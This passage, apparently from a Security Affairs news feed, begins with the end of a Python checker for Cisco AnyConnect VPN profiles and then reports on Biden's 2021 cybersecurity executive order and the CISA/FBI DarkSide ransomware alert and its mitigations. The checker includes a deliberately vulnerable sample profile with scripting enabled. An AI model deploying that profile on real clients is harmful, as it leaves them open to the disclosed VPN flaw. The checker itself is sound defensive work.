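<AnyConnectProfile xmlns="http://schemas.xmlsoft.org/encoding/AnyConnectProfile.xsd">
  <ClientInitialization>
    <EnableScripting UserControllable="false">true</EnableScripting>
  </ClientInitialization>
</AnyConnectProfile>"""  # AutoUpdate omitted, so it takes the on-by-default value

HARDENED_PROFILE = """<?xml version="1.0" encoding="UTF-8"?>
<AnyConnectProfile xmlns="http://schemas.xmlsoft.org/encoding/AnyConnectProfile.xsd">
  <ClientInitialization>
    <AutoUpdate UserControllable="false">true</AutoUpdate>
    <EnableScripting UserControllable="false">false</EnableScripting>
  </ClientInitialization>
</AnyConnectProfile>"""

if __name__ == "__main__":
    for label, xml in (("exposed", EXPOSED_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(label, profile_settings(xml), "VULNERABLE" if is_exposed(xml) else "ok")
```

A profile that omits both elements resolves to the advisory's defaults and is reported as not exposed, since Enable Scripting is off unless someone turned it on.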

Please vote Security Affairs as Best Personal cybersecurity Blog
https://docs.google.com/forms/d/e/1FAIpQLSer_6yOZrL8OO6XjJ9yj3Mlq9LvuOakdTZN9ZmhkFCy1aQLdw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Cisco AnyConnect Secure Mobility Client VPN)

The post Cisco fixes AnyConnect Client VPN zero-day disclosed in November appeared first on Security Affairs.

Biden signed executive order to improve the Nation’s Cybersecurity

13 May 2021 at 12:18

President Joe Biden signed an ambitious executive order to dramatically improve the security of the US government networks.

President Biden signed an executive order this week to improve the country’s defenses against cyberattacks. It is an important move that comes shortly after a wave of attacks such as the SolarWinds supply chain attack and the Colonial Pipeline attack.

“The United States faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately the American people’s security and privacy.  The Federal Government must improve its efforts to identify, deter, protect against, detect, and respond to these actions and actors.” reads the 34-page document.

The document, titled Executive Order on Improving the Nation’s Cybersecurity, aims to modernize cybersecurity defenses so that the federal government’s infrastructure is resilient to increasingly sophisticated attacks.

The order proposes a standardized Federal Government playbook for responding to cybersecurity vulnerabilities and incidents, and it also aims to improve the sharing of information about threats and threat actors.

The order requires IT (information technology) and OT (operational technology) service providers to share information about cybersecurity threats and incidents.

The order assigns the Secretary of Homeland Security, in consultation with the Attorney General, responsibility for establishing the Cyber Safety Review Board (Board), which will review and assess cybersecurity.

“The Board’s membership shall include Federal officials and representatives from private-sector entities. The Board shall comprise representatives of the Department of Defense, the Department of Justice, CISA, the NSA, and the FBI, as well as representatives from appropriate private-sector cybersecurity or software suppliers as determined by the Secretary of Homeland Security.” continues the order. “A representative from OMB shall participate in Board activities when an incident under review involves FCEB Information Systems, as determined by the Secretary of Homeland Security. The Secretary of Homeland Security may invite the participation of others on a case-by-case basis depending on the nature of the incident under review.”

Federal agencies are requested to implement a Zero Trust Architecture, implement multi-factor authentication, and adopt encryption for data at rest and in transit.

The order urges improving the security of the software supply chain by developing guidelines and tools and adopting best practices to audit critical software components.

“The security of software used by the Federal Government is vital to the Federal Government’s ability to perform its critical functions.” states the order. “Accordingly, the Federal Government must take action to rapidly improve the security and integrity of the software supply chain, with a priority on addressing critical software.”

The measures must ensure that software is not tampered with by threat actors and that it is resilient to supply-chain attacks.

The order also urges the deployment of a centralized Endpoint Detection and Response (EDR) solution and intra-governmental information sharing for early detection of any compromise and attack.

The actions listed in the order have to be completed within time frames ranging from 30 days to 360 days.

The White House has also released a FACT SHEET related to the executive order that provides a summary of its content.


Pierluigi Paganini

(SecurityAffairs – hacking, executive order)

The post Biden signed executive order to improve the Nation’s Cybersecurity appeared first on Security Affairs.

Can Data Protection Systems Prevent Data At Rest Leakage?

13 May 2021 at 11:47
Protection against insider risks works when the process involves controlling the data transfer channels or examining data sources. One approach involves preventing USB flash drives from being copied or sending them over email. The second one concerns preventing leakage or fraud in which an insider accesses files or databases with harmful intentions. What's the best way to protect your data? It

Dark Web Getting Loaded With Bogus Covid-19 Vaccines and Forged Cards

13 May 2021 at 10:54
Bogus COVID-19 test results, fraudulent vaccination cards, and questionable vaccines are emerging a hot commodity on the dark web in what's the latest in a long list of cybercrimes capitalizing on the coronavirus pandemic. "A new and troubling phenomenon is that consumers are buying COVID-19 vaccines on the black market due to the increased demand around the world," said Anne An, a senior

US CISA and FBI publish joint alert on DarkSide ransomware

13 May 2021 at 09:17

FBI and DHS’s CISA have published a joint alert on DarkSide ransomware activity after the disruptive attack on Colonial Pipeline.

FBI and DHS’s CISA have published a joint alert to warn of ransomware attacks conducted by the DarkSide group. The alert follows the attack on Colonial Pipeline that caused widespread disruption.

The DarkSide ransomware gang first emerged in the threat landscape in August 2020. In recent months the group has been very active and has targeted organizations worldwide.

Early this year the group announced that it would no longer attack organizations in the healthcare industry, companies involved in the development and distribution of COVID-19 vaccines, and funeral service organizations.

The alert provides technical details and mitigations related to the activity of the DarkSide ransomware gang. The group provides Ransomware-as-a-Service (RaaS) to a network of affiliates.

“DarkSide is ransomware-as-a-service (RaaS)—the developers of the ransomware receive a share of the proceeds from the cybercriminal actors who deploy it, known as “affiliates.” According to open-source reporting, since August 2020, DarkSide actors have been targeting multiple large, high-revenue organizations, resulting in the encryption and theft of sensitive data. The DarkSide group has publicly stated that they prefer to target organizations that can afford to pay large ransoms instead of hospitals, schools, non-profits, and governments.[3],[4]” reads the joint alert.

“According to open-source reporting, DarkSide actors have previously been observed gaining initial access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI) (Phishing [T1566], Exploit Public-Facing Application [T1190], External Remote Services [T1133]).[5],[6] DarkSide actors have also been observed using Remote Desktop Protocol (RDP) to maintain Persistence [TA0003].[7].”

The alert confirmed that crooks use DarkSide to gain access to a victim’s network to encrypt files on internal systems and exfiltrate data, then threaten to expose data if the victim refuses to pay the ransom.

US agencies warn that groups employed DarkSide ransomware in attacks aimed at organizations across various Critical Infrastructure sectors, including manufacturing, legal, insurance, healthcare, and energy.

Immediately after the attack on Colonial Pipeline, the DarkSide group pointed out that it is financially motivated and that there is no political motivation behind its intrusion.

“Our goal is to make money, and not creating problems for society,” reads a statement from the group.

The FBI/CISA joint alert includes mitigations for ransomware attacks: 

  • Require multi-factor authentication for remote access to OT and IT networks.
  • Enable strong spam filters to prevent phishing emails from reaching end users. Filter emails containing executable files from reaching end users.
  • Implement a user training program and simulated attacks for spearphishing to discourage users from visiting malicious websites or opening malicious attachments, and reinforce the appropriate user responses to spearphishing emails.
  • Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.
  • Update software, including operating systems, applications, and firmware on IT network assets, in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program.
  • Limit access to resources over networks, especially by restricting RDP. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.
  • Set antivirus/antimalware programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
  • Implement unauthorized execution prevention by
    • Disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
    • Implementing application allowlisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
  • Monitor and/or block inbound connections from Tor exit nodes and other anonymization services to IP addresses and ports for which external connections are not expected (i.e., other than VPN gateways, mail ports, web ports). For more guidance, refer to Joint Cybersecurity Advisory AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor.
  • Deploy signatures to detect and/or block inbound connections from Cobalt Strike servers and other post-exploitation tools.

CISA and FBI urge CI owners and operators to apply the following mitigations now to reduce the risk of severe business or functional degradation should their CI entity fall victim to a ransomware attack in the future.

  • Implement and ensure robust network segmentation between IT and OT networks.
  • Organize OT assets into logical zones.
  • Identify OT and IT network inter-dependencies and develop workarounds or manual controls.
  • Regularly test manual controls.
  • Implement regular data backup procedures.

“CISA and the FBI do not encourage paying a ransom to criminal actors,” concludes the alert. “Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered.”



Pierluigi Paganini

(SecurityAffairs – hacking, DarkSide)

The post US CISA and FBI publish joint alert on DarkSide ransomware appeared first on Security Affairs.
